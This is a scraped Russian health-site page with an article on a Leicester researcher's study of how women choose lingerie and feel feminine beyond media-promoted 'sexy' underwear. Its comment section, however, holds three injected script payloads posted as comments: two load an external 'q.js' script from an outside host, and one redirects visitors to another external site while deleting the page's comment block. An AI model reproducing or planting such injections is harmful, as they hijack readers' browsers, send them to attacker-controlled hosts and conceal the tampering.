Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сексуальное белье не един...  >>  Сексуальное белье не единственная возможность почувствовать себя женственной!
 
Обратная связь
 

Сексуальное белье не единственная возможность почувствовать себя женственной!

Размер шрифта
16 февраля 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Телевизионные шоу и глянцевые журналы настоятельно рекомендуют женщинам носить сексуальное белье. Однако, по мнению экспертов, у женщин на выбор есть множество других вариантов белья, в которых они также смогут почувствовать себя женственными и привлекательными.

Сексуальное белье не единственная возможность почувствовать себя женственной!

Доктор Кристиана Тсауси, преподаватель по маркетингу в Школе менеджмента университета Лестера, считает, что выбор белья зависит от личных предпочтений женщины, которые формируются под влиянием социального статуса, профессии и воспитания. Именно поэтому потребности каждой женщины индивидуальны. Исследование Тсауси было опубликовано в Journal of Consumer Culture.

«Многим из нас кажется, что единственный способ почувствовать себя женственной – это надеть сексуальное белье, которое так широко рекламируется в масс-медиа. Однако это вовсе не так. Журналы и ТВ шоу несут определенную цель – заставить женщин выглядеть в соответствии с западными представлениями о красоте и сексуальности», – рассказывает Кристиана. «Поэтому они предлагают женщинам белье, которое «подкорректирует» их тело и внешний вид соответствующим образом».

Однако доктор Тсауси считает, что женщины должны выбирать наиболее подходящее белье для конкретной ситуации, и что комфорт часто оказывается так же важен, как и сексуальность. «Женщины учатся правильно подбирать себе белье в зависимости от обстоятельств. Мне кажется, глянцевые журналы должны наконец начать показывать, что женщина может чувствовать себя привлекательной в самом разном белье, а не только в стереотипно сексуальных комплектах».

«Некоторые женщины не любят смотреть реалити-шоу, потому что они пропагандируют лишь определенный тип женской сексуальности, достичь которого в реальности часто невозможно. Женщины могут даже чувствовать себя виноватыми из-за того, как они выглядят, из-за того, как выглядит их тело без «сексуального» белья», – добавляет доктор Тсауси. «Когда мужчины выбирают своей любимой белье в подарок, они должны отдавать предпочтение тому, что действительно ей подойдет и в чем ей будет удобно».

Доктор Тсауси опросила множество женщин из очень разных социальных групп – преподавателей в университете, молодых мам, игроков в рэгби и многих других. Она хотела понять, как на предпочтения в выборе белья влияет воспитание, профессия, возраст и социальный статус.

«Моя работа показала, что выбор женщиной белья в значительной степени зависит от ее образа мыслей, вкуса и социального положения», – рассказывает Кристиана. Также на многих женщин большое влияние оказывают предпочтения и стиль их матерей. «Мы не должны забывать о том, что именно мама обычно покупает первый бюстгальтер своей дочери, и часто в этот момент девочка впервые чувствует себя женственной».

Тсауси также добавила, что подробных исследований этого вопроса пока не проводилось, а ведь он очень важен для рынка: «Выбор верхней одежды очень широко освещен в различных маркетинговых исследованиях, в то время как рынок нижнего белья остается малоизученным».

Так что следовать за модой вовсе необязательно, выбирайте то, что понравится именно вам, и в чем вы будете чувствовать себя уверенно и привлекательно.

Все тайны секса после 45 раскрываются на страницах нашего спецпроекта.

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:18

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Правила секса в 30, 40, 50 лет   В 45 баба ягодка опять   Хотите секса? Ложитесь спать!   Как секс избавит вас от врачей  
26 апреля 2013Не заставляйте мужчин убираться дома! Последнее исследование показало, что у таких пар меньше секса! 12 декабря 2012Гормон оргазма не дает мужчинам изменять
 
18 сентября 2012Нет презерватива? Будет рак простаты! 09 июля 2013Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить?
 

Слайдшоу

1
Как вернуть секс в вашу жизнь
Как оставаться сексуальной в 45
Сохраняя самое важное

Тесты

Здорова ли ваша предстательная железа
Вы и то, что на вас
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.